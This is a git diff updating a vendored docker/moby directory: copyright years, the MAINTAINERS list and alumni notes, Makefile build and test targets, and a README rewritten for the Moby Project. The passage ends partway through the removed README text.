diff --git a/vendor/github.com/docker/docker/LICENSE b/vendor/github.com/docker/docker/LICENSE
index 8f3fee627a..9c8e20ab85 100644
--- a/vendor/github.com/docker/docker/LICENSE
+++ b/vendor/github.com/docker/docker/LICENSE
@@ -176,7 +176,7 @@
 
    END OF TERMS AND CONDITIONS
 
-   Copyright 2013-2016 Docker, Inc.
+   Copyright 2013-2017 Docker, Inc.
 
    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
diff --git a/vendor/github.com/docker/docker/MAINTAINERS b/vendor/github.com/docker/docker/MAINTAINERS
index 39bb8c1308..3ac06d2728 100644
--- a/vendor/github.com/docker/docker/MAINTAINERS
+++ b/vendor/github.com/docker/docker/MAINTAINERS
@@ -1,12 +1,14 @@
-# Docker maintainers file
+# Moby maintainers file
 #
-# This file describes who runs the docker/docker project and how.
-# This is a living document - if you see something out of date or missing, speak up!
+# This file describes the maintainer groups within the moby/moby project.
+# More detail on Moby project governance is available in the
+# project/GOVERNANCE.md file found in this repository.
 #
 # It is structured to be consumable by both humans and programs.
 # To extract its contents programmatically, use any TOML-compliant
 # parser.
 #
+# TODO(estesp): This file should not necessarily depend on docker/opensource
 # This file is compiled into the MAINTAINERS file in docker/opensource.
 #
 [Org]
@@ -21,14 +23,9 @@
 	# a subsystem, they are responsible for doing so and holding the
 	# subsystem maintainers accountable. If ownership is unclear, they are the de facto owners.
 
-	# For each release (including minor releases), a "release captain" is assigned from the
-	# pool of core maintainers. Rotation is encouraged across all maintainers, to ensure
-	# the release process is clear and up-to-date.
-
 		people = [
 			"aaronlehmann",
 			"akihirosuda",
-			"aluzzardi",
 			"anusha",
 			"coolljt0725",
 			"cpuguy83",
@@ -36,22 +33,21 @@
 			"dnephin",
 			"duglin",
 			"estesp",
-			"icecrime",
 			"jhowardmsft",
+			"johnstep",
 			"justincormack",
-			"lk4d4",
-			"mavenugo",
 			"mhbauer",
 			"mlaventure",
-			"mrjana",
 			"runcom",
 			"stevvooe",
+			"thajeztah",
 			"tianon",
 			"tibor",
 			"tonistiigi",
 			"unclejack",
 			"vdemeester",
-			"vieux"
+			"vieux",
+			"yongtang"
 		]
 
 	[Org."Docs maintainers"]
@@ -59,9 +55,7 @@
 	# TODO Describe the docs maintainers role.
 
 		people = [
-			"jamtur01",
 			"misty",
-			"sven",
 			"thajeztah"
 		]
 
@@ -78,11 +72,15 @@
 	# - close an issue or pull request when it's inappropriate or off-topic
 
 		people = [
-			"aboch",
+			"alexellis",
 			"andrewhsu",
-			"ehazlett",
-			"mgoelzer",
+			"anonymuse",
+			"chanwit",
+			"fntlnz",
+			"gianarb",
 			"programmerq",
+			"rheinwein",
+			"ripcurld",
 			"thajeztah"
 		]
 
@@ -93,6 +91,16 @@
 	# Thank you!
 
 		people = [
+			# Harald Albers is the mastermind behind the bash completion scripts for the
+			# Docker CLI. The completion scripts moved to the Docker CLI repository, so
+			# you can now find him perform his magic in the https://github.com/docker/cli repository.
+			"albers",
+
+			# Andrea Luzzardi started contributing to the Docker codebase in the "dotCloud"
+			# era, even before it was called "Docker". He is one of the architects of both
+			# Swarm and SwarmKit, and its integration into the Docker engine.
+			"aluzzardi",
+			
 			# David Calavera contributed many features to Docker, such as an improved
 			# event system, dynamic configuration reloading, volume plugins, fancy
 			# new templating options, and an external client credential store. As a
@@ -110,6 +118,33 @@
 			# still stumble into him in our issue tracker, or on IRC.
 			"erikh",
 
+			# Evan Hazlett is the creator of of the Shipyard and Interlock open source projects,
+			# and the author of "Orca", which became the foundation of Docker Universal Control
+			# Plane (UCP). As a maintainer, Evan helped integrating SwarmKit (secrets, tasks)
+			# into the Docker engine.
+			"ehazlett",
+
+			# Arnaud Porterie (AKA "icecrime") was in charge of maintaining the maintainers.
+			# As a maintainer, he made life easier for contributors to the Docker open-source
+			# projects, bringing order in the chaos by designing a triage- and review workflow
+			# using labels (see https://icecrime.net/technology/a-structured-approach-to-labeling/),
+			# and automating the hell out of things with his buddies GordonTheTurtle and Poule
+			# (a chicken!).
+			# 
+			# A lesser-known fact is that he created the first commit in the libnetwork repository
+			# even though he didn't know anything about it. Some say, he's now selling stuff on
+			# the internet ;-)
+			"icecrime",
+
+			# After a false start with his first PR being rejected, James Turnbull became a frequent
+			# contributor to the documentation, and became a docs maintainer on December 5, 2013. As
+			# a maintainer, James lifted the docs to a higher standard, and introduced the community
+			# guidelines ("three strikes"). James is currently changing the world as CTO of https://www.empatico.org,
+			# meanwhile authoring various books that are worth checking out. You can find him on Twitter,
+			# rambling as @kartar, and although no longer active as a maintainer, he's always "game" to
+			# help out reviewing docs PRs, so you may still see him around in the repository.
+			"jamtur01",
+
 			# Jessica Frazelle, also known as the "Keyser Söze of containers",
 			# runs *everything* in containers. She started contributing to
 			# Docker with a (fun fun) change involving both iptables and regular
@@ -120,13 +155,24 @@
 			# containers a lot more secure). Besides being a maintainer, she
 			# set up the CI infrastructure for the project, giving everyone
 			# something to shout at if a PR failed ("noooo Janky!").
-			# Jess is currently working on the DCOS security team at Mesosphere,
-			# and contributing to various open source projects.
 			# Be sure you don't miss her talks at a conference near you (a must-see),
 			# read her blog at https://blog.jessfraz.com (a must-read), and
 			# check out her open source projects on GitHub https://github.com/jessfraz (a must-try).
 			"jessfraz",
 
+			# Alexander Morozov contributed many features to Docker, worked on the premise of 
+			# what later became containerd (and worked on that too), and made a "stupid" Go
+			# vendor tool specificaly for docker/docker needs: vndr (https://github.com/LK4D4/vndr).
+			# Not many know that Alexander is a master negotiator, being able to change course
+			# of action with a single "Nope, we're not gonna do that".
+			"lk4d4",
+
+			# Madhu Venugopal was part of the SocketPlane team that joined Docker.
+			# As a maintainer, he was working with Jana for the Container Network
+			# Model (CNM) implemented through libnetwork, and the "routing mesh" powering
+			# Swarm mode networking.
+			"mavenugo",
+
 			# As a docs maintainer, Mary Anthony contributed greatly to the Docker
 			# docs. She wrote the Docker Contributor Guide and Getting Started
 			# Guides. She helped create a doc build system independent of
@@ -136,6 +182,30 @@
 			# maryatdocker/docker-whale back in May 2015.
 			"moxiegirl",
 
+			# Jana Radhakrishnan was part of the SocketPlane team that joined Docker.
+			# As a maintainer, he was the lead architect for the Container Network
+			# Model (CNM) implemented through libnetwork, and the "routing mesh" powering
+			# Swarm mode networking.
+			#
+			# Jana started new adventures in networking, but you can find him tweeting as @mrjana,
+			# coding on GitHub https://github.com/mrjana, and he may be hiding on the Docker Community
+			# slack channel :-)
+			"mrjana",
+
+			# Sven Dowideit became a well known person in the Docker ecosphere, building
+			# boot2docker, and became a regular contributor to the project, starting as
+			# early as October 2013 (https://github.com/docker/docker/pull/2119), to become
+			# a maintainer less than two months later (https://github.com/docker/docker/pull/3061).
+			#
+			# As a maintainer, Sven took on the task to convert the documentation from
+			# ReStructuredText to Markdown, migrate to Hugo for generating the docs, and
+			# writing tooling for building, testing, and publishing them.
+			#
+			# If you're not in the occasion to visit "the Australian office", you
+			# can keep up with Sven on Twitter (@SvenDowideit), his blog http://fosiki.com,
+			# and of course on GitHub.
+			"sven",
+
 			# Vincent "vbatts!" Batts made his first contribution to the project
 			# in November 2013, to become a maintainer a few months later, on
 			# May 10, 2014 (https://github.com/docker/docker/commit/d6e666a87a01a5634c250358a94c814bf26cb778).
@@ -170,10 +240,10 @@
 	Email = "aaron.lehmann@docker.com"
 	GitHub = "aaronlehmann"
 
-	[people.aboch]
-	Name = "Alessandro Boch"
-	Email = "aboch@docker.com"
-	GitHub = "aboch"
+	[people.alexellis]
+	Name = "Alex Ellis"
+	Email = "alexellis2@gmail.com"
+	GitHub = "alexellis"
 
 	[people.akihirosuda]
 	Name = "Akihiro Suda"
@@ -185,11 +255,21 @@
 	Email = "al@docker.com"
 	GitHub = "aluzzardi"
 
+	[people.albers]
+	Name = "Harald Albers"
+	Email = "github@albersweb.de"
+	GitHub = "albers"
+
 	[people.andrewhsu]
 	Name = "Andrew Hsu"
 	Email = "andrewhsu@docker.com"
 	GitHub = "andrewhsu"
 
+	[people.anonymuse]
+	Name = "Jesse White"
+	Email = "anonymuse@gmail.com"
+	GitHub = "anonymuse"
+
 	[people.anusha]
 	Name = "Anusha Ragunathan"
 	Email = "anusha@docker.com"
@@ -208,7 +288,12 @@
 	[people.cpuguy83]
 	Name = "Brian Goff"
 	Email = "cpuguy83@gmail.com"
-	Github = "cpuguy83"
+	GitHub = "cpuguy83"
+
+	[people.chanwit]
+	Name = "Chanwit Kaewkasi"
+	Email = "chanwit@gmail.com"
+	GitHub = "chanwit"
 
 	[people.crosbymichael]
 	Name = "Michael Crosby"
@@ -240,9 +325,19 @@
 	Email = "estesp@linux.vnet.ibm.com"
 	GitHub = "estesp"
 
+	[people.fntlnz]
+	Name = "Lorenzo Fontana"
+	Email = "fontanalorenz@gmail.com"
+	GitHub = "fntlnz"
+
+	[people.gianarb]
+	Name = "Gianluca Arbezzano"
+	Email = "ga@thumpflow.com"
+	GitHub = "gianarb"
+
 	[people.icecrime]
 	Name = "Arnaud Porterie"
-	Email = "arnaud@docker.com"
+	Email = "icecrime@gmail.com"
 	GitHub = "icecrime"
 
 	[people.jamtur01]
@@ -260,6 +355,11 @@
 	Email = "jess@linux.com"
 	GitHub = "jessfraz"
 
+	[people.johnstep]
+	Name = "John Stephens"
+	Email = "johnstep@docker.com"
+	GitHub = "johnstep"
+
 	[people.justincormack]
 	Name = "Justin Cormack"
 	Email = "justin.cormack@docker.com"
@@ -275,11 +375,6 @@
 	Email = "madhu@docker.com"
 	GitHub = "mavenugo"
 
-	[people.mgoelzer]
-	Name = "Mike Goelzer"
-	Email = "mike.goelzer@docker.com"
-	GitHub = "mgoelzer"
-
 	[people.mhbauer]
 	Name = "Morgan Bauer"
 	Email = "mbauer@us.ibm.com"
@@ -288,11 +383,11 @@
 	[people.misty]
 	Name = "Misty Stanley-Jones"
 	Email = "misty@docker.com"
-	GitHub = "mstanleyjones"
+	GitHub = "mistyhacks"
 
 	[people.mlaventure]
 	Name = "Kenfe-Mickaël Laventure"
-	Email = "mickael.laventure@docker.com"
+	Email = "mickael.laventure@gmail.com"
 	GitHub = "mlaventure"
 
 	[people.moxiegirl]
@@ -310,6 +405,16 @@
 	Email = "jeff@docker.com"
 	GitHub = "programmerq"
 
+	[people.rheinwein]
+	Name = "Laura Frank"
+	Email = "laura@codeship.com"
+	GitHub = "rheinwein"
+
+	[people.ripcurld]
+	Name = "Boaz Shuster"
+	Email = "ripcurld.github@gmail.com"
+	GitHub = "ripcurld"
+
 	[people.runcom]
 	Name = "Antonio Murdaca"
 	Email = "runcom@redhat.com"
@@ -374,3 +479,8 @@
 	Name = "Vishnu Kannan"
 	Email = "vishnuk@google.com"
 	GitHub = "vishh"
+
+	[people.yongtang]
+	Name = "Yong Tang"
+	Email = "yong.tang.github@outlook.com"
+	GitHub = "yongtang"
diff --git a/vendor/github.com/docker/docker/Makefile b/vendor/github.com/docker/docker/Makefile
index 81bde6b4f6..f344b5cc3b 100644
--- a/vendor/github.com/docker/docker/Makefile
+++ b/vendor/github.com/docker/docker/Makefile
@@ -1,31 +1,51 @@
-.PHONY: all binary build cross deb help init-go-pkg-cache install manpages rpm run shell test test-docker-py test-integration-cli test-unit tgz validate win
+.PHONY: all binary dynbinary build cross help init-go-pkg-cache install manpages run shell test test-docker-py test-integration test-unit validate win
 
 # set the graph driver as the current graphdriver if not set
 DOCKER_GRAPHDRIVER := $(if $(DOCKER_GRAPHDRIVER),$(DOCKER_GRAPHDRIVER),$(shell docker info 2>&1 | grep "Storage Driver" | sed 's/.*: //'))
+export DOCKER_GRAPHDRIVER
+DOCKER_INCREMENTAL_BINARY := $(if $(DOCKER_INCREMENTAL_BINARY),$(DOCKER_INCREMENTAL_BINARY),1)
+export DOCKER_INCREMENTAL_BINARY
 
 # get OS/Arch of docker engine
-DOCKER_OSARCH := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKER_ENGINE_OSARCH:-$$DOCKER_CLIENT_OSARCH}')
+DOCKER_OSARCH := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKER_ENGINE_OSARCH}')
 DOCKERFILE := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKERFILE}')
 
+DOCKER_GITCOMMIT := $(shell git rev-parse --short HEAD || echo unsupported)
+export DOCKER_GITCOMMIT
+
 # env vars passed through directly to Docker's build scripts
 # to allow things like `make KEEPBUNDLE=1 binary` easily
 # `project/PACKAGERS.md` have some limited documentation of some of these
+#
+# DOCKER_LDFLAGS can be used to pass additional parameters to -ldflags
+# option of "go build". For example, a built-in graphdriver priority list
+# can be changed during build time like this:
+#
+# make DOCKER_LDFLAGS="-X github.com/docker/docker/daemon/graphdriver.priority=overlay2,devicemapper" dynbinary
+#
 DOCKER_ENVS := \
+	-e DOCKER_CROSSPLATFORMS \
 	-e BUILD_APT_MIRROR \
 	-e BUILDFLAGS \
 	-e KEEPBUNDLE \
 	-e DOCKER_BUILD_ARGS \
 	-e DOCKER_BUILD_GOGC \
 	-e DOCKER_BUILD_PKGS \
+	-e DOCKER_BUILDKIT \
+	-e DOCKER_BASH_COMPLETION_PATH \
+	-e DOCKER_CLI_PATH \
 	-e DOCKER_DEBUG \
 	-e DOCKER_EXPERIMENTAL \
 	-e DOCKER_GITCOMMIT \
-	-e DOCKER_GRAPHDRIVER=$(DOCKER_GRAPHDRIVER) \
+	-e DOCKER_GRAPHDRIVER \
 	-e DOCKER_INCREMENTAL_BINARY \
+	-e DOCKER_LDFLAGS \
 	-e DOCKER_PORT \
 	-e DOCKER_REMAP_ROOT \
 	-e DOCKER_STORAGE_OPTS \
 	-e DOCKER_USERLANDPROXY \
+	-e DOCKERD_ARGS \
+	-e TEST_INTEGRATION_DIR \
 	-e TESTDIRS \
 	-e TESTFLAGS \
 	-e TIMEOUT \
@@ -34,7 +54,9 @@ DOCKER_ENVS := \
 	-e NO_PROXY \
 	-e http_proxy \
 	-e https_proxy \
-	-e no_proxy
+	-e no_proxy \
+	-e VERSION \
+	-e PLATFORM
 # note: we _cannot_ add "-e DOCKER_BUILDTAGS" here because even if it's unset in the shell, that would shadow the "ENV DOCKER_BUILDTAGS" set in our Dockerfile, which is very important for our official builds
 
 # to allow `make BIND_DIR=. shell` or `make BIND_DIR= test`
@@ -46,22 +68,39 @@ DOCKER_MOUNT := $(if $(BIND_DIR),-v "$(CURDIR)/$(BIND_DIR):/go/src/github.com/do
 # This allows the test suite to be able to run without worrying about the underlying fs used by the container running the daemon (e.g. aufs-on-aufs), so long as the host running the container is running a supported fs.
 # The volume will be cleaned up when the container is removed due to `--rm`.
 # Note that `BIND_DIR` will already be set to `bundles` if `DOCKER_HOST` is not set (see above BIND_DIR line), in such case this will do nothing since `DOCKER_MOUNT` will already be set.
-DOCKER_MOUNT := $(if $(DOCKER_MOUNT),$(DOCKER_MOUNT),-v /go/src/github.com/docker/docker/bundles)
+DOCKER_MOUNT := $(if $(DOCKER_MOUNT),$(DOCKER_MOUNT),-v /go/src/github.com/docker/docker/bundles) -v "$(CURDIR)/.git:/go/src/github.com/docker/docker/.git"
+
+# This allows to set the docker-dev container name
+DOCKER_CONTAINER_NAME := $(if $(CONTAINER_NAME),--name $(CONTAINER_NAME),)
 
-# enable .go-pkg-cache if DOCKER_INCREMENTAL_BINARY and DOCKER_MOUNT (i.e.DOCKER_HOST) are set
-PKGCACHE_DIR := $(if $(PKGCACHE_DIR),$(PKGCACHE_DIR),.go-pkg-cache)
-PKGCACHE_MAP := gopath:/go/pkg goroot-linux_amd64_netgo:/usr/local/go/pkg/linux_amd64_netgo
-DOCKER_MOUNT := $(if $(DOCKER_INCREMENTAL_BINARY),$(DOCKER_MOUNT) $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^ ]*)@-v "$(CURDIR)/$(PKGCACHE_DIR)/\1"@g'),$(DOCKER_MOUNT))
+# enable package cache if DOCKER_INCREMENTAL_BINARY and DOCKER_MOUNT (i.e.DOCKER_HOST) are set
+PKGCACHE_MAP := gopath:/go/pkg goroot-linux_amd64:/usr/local/go/pkg/linux_amd64 goroot-linux_amd64_netgo:/usr/local/go/pkg/linux_amd64_netgo
+PKGCACHE_VOLROOT := dockerdev-go-pkg-cache
+PKGCACHE_VOL := $(if $(PKGCACHE_DIR),$(CURDIR)/$(PKGCACHE_DIR)/,$(PKGCACHE_VOLROOT)-)
+DOCKER_MOUNT_PKGCACHE := $(if $(DOCKER_INCREMENTAL_BINARY),$(shell echo $(PKGCACHE_MAP) | sed -E 's@([^ ]*)@-v "$(PKGCACHE_VOL)\1"@g'),)
+DOCKER_MOUNT_CLI := $(if $(DOCKER_CLI_PATH),-v $(shell dirname $(DOCKER_CLI_PATH)):/usr/local/cli,)
+DOCKER_MOUNT_BASH_COMPLETION := $(if $(DOCKER_BASH_COMPLETION_PATH),-v $(shell dirname $(DOCKER_BASH_COMPLETION_PATH)):/usr/local/completion/bash,)
+DOCKER_MOUNT := $(DOCKER_MOUNT) $(DOCKER_MOUNT_PKGCACHE) $(DOCKER_MOUNT_CLI) $(DOCKER_MOUNT_BASH_COMPLETION)
 
 GIT_BRANCH := $(shell git rev-parse --abbrev-ref HEAD 2>/dev/null)
 GIT_BRANCH_CLEAN := $(shell echo $(GIT_BRANCH) | sed -e "s/[^[:alnum:]]/-/g")
 DOCKER_IMAGE := docker-dev$(if $(GIT_BRANCH_CLEAN),:$(GIT_BRANCH_CLEAN))
 DOCKER_PORT_FORWARD := $(if $(DOCKER_PORT),-p "$(DOCKER_PORT)",)
 
-DOCKER_FLAGS := docker run --rm -i --privileged $(DOCKER_ENVS) $(DOCKER_MOUNT) $(DOCKER_PORT_FORWARD)
+DOCKER_FLAGS := docker run --rm -i --privileged $(DOCKER_CONTAINER_NAME) $(DOCKER_ENVS) $(DOCKER_MOUNT) $(DOCKER_PORT_FORWARD)
 BUILD_APT_MIRROR := $(if $(DOCKER_BUILD_APT_MIRROR),--build-arg APT_MIRROR=$(DOCKER_BUILD_APT_MIRROR))
 export BUILD_APT_MIRROR
 
+SWAGGER_DOCS_PORT ?= 9000
+
+INTEGRATION_CLI_MASTER_IMAGE := $(if $(INTEGRATION_CLI_MASTER_IMAGE), $(INTEGRATION_CLI_MASTER_IMAGE), integration-cli-master)
+INTEGRATION_CLI_WORKER_IMAGE := $(if $(INTEGRATION_CLI_WORKER_IMAGE), $(INTEGRATION_CLI_WORKER_IMAGE), integration-cli-worker)
+
+define \n
+
+
+endef
+
 # if this session isn't interactive, then we don't want to allocate a
 # TTY, which would fail, but if it is interactive, we do want to attach
 # so that the user can send e.g. ^C through.
@@ -80,57 +119,54 @@ all: build ## validate all checks, build linux binaries, run all tests\ncross bu
 binary: build ## build the linux binaries
 	$(DOCKER_RUN_DOCKER) hack/make.sh binary
 
+dynbinary: build ## build the linux dynbinaries
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary
+
 build: bundles init-go-pkg-cache
+	$(warning The docker client CLI has moved to github.com/docker/cli. For a dev-test cycle involving the CLI, run:${\n} DOCKER_CLI_PATH=/host/path/to/cli/binary make shell ${\n} then change the cli and compile into a binary at the same location.${\n})
 	docker build ${BUILD_APT_MIRROR} ${DOCKER_BUILD_ARGS} -t "$(DOCKER_IMAGE)" -f "$(DOCKERFILE)" .
 
 bundles:
 	mkdir bundles
 
-cross: build ## cross build the binaries for darwin, freebsd and\nwindows
-	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross
+clean: clean-pkg-cache-vol ## clean up cached resources
 
-deb: build  ## build the deb packages
-	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary build-deb
+clean-pkg-cache-vol:
+	@- $(foreach mapping,$(PKGCACHE_MAP), \
+		$(shell docker volume rm $(PKGCACHE_VOLROOT)-$(shell echo $(mapping) | awk -F':/' '{ print $$1 }') > /dev/null 2>&1) \
+	)
 
+cross: build ## cross build the binaries for darwin, freebsd and\nwindows
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross
 
 help: ## this help
 	@awk 'BEGIN {FS = ":.*?## "} /^[a-zA-Z_-]+:.*?## / {sub("\\\\n",sprintf("\n%22c"," "), $$2);printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}' $(MAKEFILE_LIST)
 
 init-go-pkg-cache:
-	mkdir -p $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^: ]*):[^ ]*@$(PKGCACHE_DIR)/\1@g')
+	$(if $(PKGCACHE_DIR), mkdir -p $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^: ]*):[^ ]*@$(PKGCACHE_DIR)/\1@g'))
 
 install: ## install the linux binaries
 	KEEPBUNDLE=1 hack/make.sh install-binary
 
-manpages: ## Generate man pages from go source and markdown
-	docker build -t docker-manpage-dev -f "man/$(DOCKERFILE)" ./man
-	docker run --rm \
-		-v $(PWD):/go/src/github.com/docker/docker/ \
-		docker-manpage-dev
-
-rpm: build ## build the rpm packages
-	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary build-rpm
-
 run: build ## run the docker daemon in a container
 	$(DOCKER_RUN_DOCKER) sh -c "KEEPBUNDLE=1 hack/make.sh install-binary run"
 
 shell: build ## start a shell inside the build env
 	$(DOCKER_RUN_DOCKER) bash
 
-test: build ## run the unit, integration and docker-py tests
-	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary cross test-unit test-integration-cli test-docker-py
+test: build test-unit ## run the unit, integration and docker-py tests
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary cross test-integration test-docker-py
 
 test-docker-py: build ## run the docker-py tests
 	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary test-docker-py
 
-test-integration-cli: build ## run the integration tests
-	$(DOCKER_RUN_DOCKER) hack/make.sh build-integration-test-binary dynbinary test-integration-cli
+test-integration-cli: test-integration ## (DEPRECATED) use test-integration
 
-test-unit: build ## run the unit tests
-	$(DOCKER_RUN_DOCKER) hack/make.sh test-unit
+test-integration: build ## run the integration tests
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary test-integration
 
-tgz: build ## build the archives (.zip on windows and .tgz\notherwise) containing the binaries
-	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross tgz
+test-unit: build ## run the unit tests
+	$(DOCKER_RUN_DOCKER) hack/test/unit
 
 validate: build ## validate DCO, Seccomp profile generation, gofmt,\n./pkg/ isolation, golint, tests, tomls, go vet and vendor
 	$(DOCKER_RUN_DOCKER) hack/validate/all
@@ -145,3 +181,27 @@ swagger-gen:
 		--entrypoint hack/generate-swagger-api.sh \
 		-e GOPATH=/go \
 		quay.io/goswagger/swagger:0.7.4
+
+.PHONY: swagger-docs
+swagger-docs: ## preview the API documentation
+	@echo "API docs preview will be running at http://localhost:$(SWAGGER_DOCS_PORT)"
+	@docker run --rm -v $(PWD)/api/swagger.yaml:/usr/share/nginx/html/swagger.yaml \
+		-e 'REDOC_OPTIONS=hide-hostname="true" lazy-rendering' \
+		-p $(SWAGGER_DOCS_PORT):80 \
+		bfirsh/redoc:1.6.2
+
+build-integration-cli-on-swarm: build ## build images and binary for running integration-cli on Swarm in parallel
+	@echo "Building hack/integration-cli-on-swarm (if build fails, please refer to hack/integration-cli-on-swarm/README.md)"
+	go build -buildmode=pie -o ./hack/integration-cli-on-swarm/integration-cli-on-swarm ./hack/integration-cli-on-swarm/host
+	@echo "Building $(INTEGRATION_CLI_MASTER_IMAGE)"
+	docker build -t $(INTEGRATION_CLI_MASTER_IMAGE) hack/integration-cli-on-swarm/agent
+# For worker, we don't use `docker build` so as to enable DOCKER_INCREMENTAL_BINARY and so on
+	@echo "Building $(INTEGRATION_CLI_WORKER_IMAGE) from $(DOCKER_IMAGE)"
+	$(eval tmp := integration-cli-worker-tmp)
+# We mount pkgcache, but not bundle (bundle needs to be baked into the image)
+# For avoiding bakings DOCKER_GRAPHDRIVER and so on to image, we cannot use $(DOCKER_ENVS) here
+	docker run -t -d --name $(tmp) -e DOCKER_GITCOMMIT -e BUILDFLAGS -e DOCKER_INCREMENTAL_BINARY --privileged $(DOCKER_MOUNT_PKGCACHE) $(DOCKER_IMAGE) top
+	docker exec $(tmp) hack/make.sh build-integration-test-binary dynbinary
+	docker exec $(tmp) go build -buildmode=pie -o /worker github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker
+	docker commit -c 'ENTRYPOINT ["/worker"]' $(tmp) $(INTEGRATION_CLI_WORKER_IMAGE)
+	docker rm -f $(tmp)
diff --git a/vendor/github.com/docker/docker/NOTICE b/vendor/github.com/docker/docker/NOTICE
index 8a37c1c7bc..0c74e15b05 100644
--- a/vendor/github.com/docker/docker/NOTICE
+++ b/vendor/github.com/docker/docker/NOTICE
@@ -1,5 +1,5 @@
 Docker
-Copyright 2012-2016 Docker, Inc.
+Copyright 2012-2017 Docker, Inc.
 
 This product includes software developed at Docker, Inc. (https://www.docker.com).
 
diff --git a/vendor/github.com/docker/docker/README.md b/vendor/github.com/docker/docker/README.md
index 0b33bdca0d..534fd97db3 100644
--- a/vendor/github.com/docker/docker/README.md
+++ b/vendor/github.com/docker/docker/README.md
@@ -1,270 +1,48 @@
-Docker: the container engine [![Release](https://img.shields.io/github/release/docker/docker.svg)](https://github.com/docker/docker/releases/latest)
-============================
+The Moby Project
+================
 
-Docker is an open source project to pack, ship and run any application
-as a lightweight container.
+![Moby Project logo](docs/static_files/moby-project-logo.png "The Moby Project")
 
-Docker containers are both *hardware-agnostic* and *platform-agnostic*.
-This means they can run anywhere, from your laptop to the largest
-cloud compute instance and everything in between - and they don't require
-you to use a particular language, framework or packaging system. That
-makes them great building blocks for deploying and scaling web apps,
-databases, and backend services without depending on a particular stack
-or provider.
+Moby is an open-source project created by Docker to enable and accelerate software containerization.
 
-Docker began as an open-source implementation of the deployment engine which
-powered [dotCloud](http://web.archive.org/web/20130530031104/https://www.dotcloud.com/),
-a popular Platform-as-a-Service. It benefits directly from the experience
-accumulated over several years of large-scale operation and support of hundreds
-of thousands of applications and databases.
+It provides a "Lego set" of toolkit components, the framework for assembling them into custom container-based systems, and a place for all container enthusiasts and professionals to experiment and exchange ideas.
+Components include container build tools, a container registry, orchestration tools, a runtime and more, and these can be used as building blocks in conjunction with other tools and projects.
 
-![Docker logo](docs/static_files/docker-logo-compressed.png "Docker")
+## Principles
 
-## Security Disclosure
+Moby is an open project guided by strong principles, aiming to be modular, flexible and without too strong an opinion on user experience.
+It is open to the community to help set its direction.
 
-Security is very important to us. If you have any issue regarding security,
-please disclose the information responsibly by sending an email to
-security@docker.com and not by creating a GitHub issue.
+- Modular: the project includes lots of components that have well-defined functions and APIs that work together.
+- Batteries included but swappable: Moby includes enough components to build fully featured container system, but its modular architecture ensures that most of the components can be swapped by different implementations.
+- Usable security: Moby provides secure defaults without compromising usability.
+- Developer focused: The APIs are intended to be functional and useful to build powerful tools.
+They are not necessarily intended as end user tools but as components aimed at developers.
+Documentation and UX is aimed at developers not end users.
 
-## Better than VMs
+## Audience
 
-A common method for distributing applications and sandboxing their
-execution is to use virtual machines, or VMs. Typical VM formats are
-VMware's vmdk, Oracle VirtualBox's vdi, and Amazon EC2's ami. In theory
-these formats should allow every developer to automatically package
-their application into a "machine" for easy distribution and deployment.
-In practice, that almost never happens, for a few reasons:
+The Moby Project is intended for engineers, integrators and enthusiasts looking to modify, hack, fix, experiment, invent and build systems based on containers.
+It is not for people looking for a commercially supported system, but for people who want to work and learn with open source code.
 
-  * *Size*: VMs are very large which makes them impractical to store
-     and transfer.
-  * *Performance*: running VMs consumes significant CPU and memory,
-    which makes them impractical in many scenarios, for example local
-    development of multi-tier applications, and large-scale deployment
-    of cpu and memory-intensive applications on large numbers of
-    machines.
-  * *Portability*: competing VM environments don't play well with each
-     other. Although conversion tools do exist, they are limited and
-     add even more overhead.
-  * *Hardware-centric*: VMs were designed with machine operators in
-    mind, not software developers. As a result, they offer very
-    limited tooling for what developers need most: building, testing
-    and running their software. For example, VMs offer no facilities
-    for application versioning, monitoring, configuration, logging or
-    service discovery.
+## Relationship with Docker
 
-By contrast, Docker relies on a different sandboxing method known as
-*containerization*. Unlike traditional virtualization, containerization
-takes place at the kernel level. Most modern operating system kernels
-now support the primitives necessary for containerization, including
-Linux with [openvz](https://openvz.org),
-[vserver](http://linux-vserver.org) and more recently
-[lxc](https://linuxcontainers.org/), Solaris with
-[zones](https://docs.oracle.com/cd/E26502_01/html/E29024/preface-1.html#scrolltoc),
-and FreeBSD with
-[Jails](https://www.freebsd.org/doc/handbook/jails.html).
+The components and tools in the Moby Project are initially the open source components that Docker and the community have built for the Docker Project.
+New projects can be added if they fit with the community goals. Docker is committed to using Moby as the upstream for the Docker Product.
+However, other projects are also encouraged to use Moby as an upstream, and to reuse the components in diverse ways, and all these uses will be treated in the same way. External maintainers and contributors are welcomed.
 
-Docker builds on top of these low-level primitives to offer developers a
-portable format and runtime environment that solves all four problems.
-Docker containers are small (and their transfer can be optimized with
-layers), they have basically zero memory and cpu overhead, they are
-completely portable, and are designed from the ground up with an
-application-centric design.
+The Moby project is not intended as a location for support or feature requests for Docker products, but as a place for contributors to work on open source code, fix bugs, and make the code more useful.
+The releases are supported by the maintainers, community and users, on a best efforts basis only, and are not intended for customers who want enterprise or commercial support; Docker EE is the appropriate product for these use cases.
 
-Perhaps best of all, because Docker operates at the OS level, it can still be
-run inside a VM!
+-----
 
-## Plays well with others
-
-Docker does not require you to buy into a particular programming
-language, framework, packaging system, or configuration language.
-
-Is your application a Unix process? Does it use files, tcp connections,
-environment variables, standard Unix streams and command-line arguments
-as inputs and outputs? Then Docker can run it.
-
-Can your application's build be expressed as a sequence of such
-commands? Then Docker can build it.
-
-## Escape dependency hell
-
-A common problem for developers is the difficulty of managing all
-their application's dependencies in a simple and automated way.
-
-This is usually difficult for several reasons:
-
